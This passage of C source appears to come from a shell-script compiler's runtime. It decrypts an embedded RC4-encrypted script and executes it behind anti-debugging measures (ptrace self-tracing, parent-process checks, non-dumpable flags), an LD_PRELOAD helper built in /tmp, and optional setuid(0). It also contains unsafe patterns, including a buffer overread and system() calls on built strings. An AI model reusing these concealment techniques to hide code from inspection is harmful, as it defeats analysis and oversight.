    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
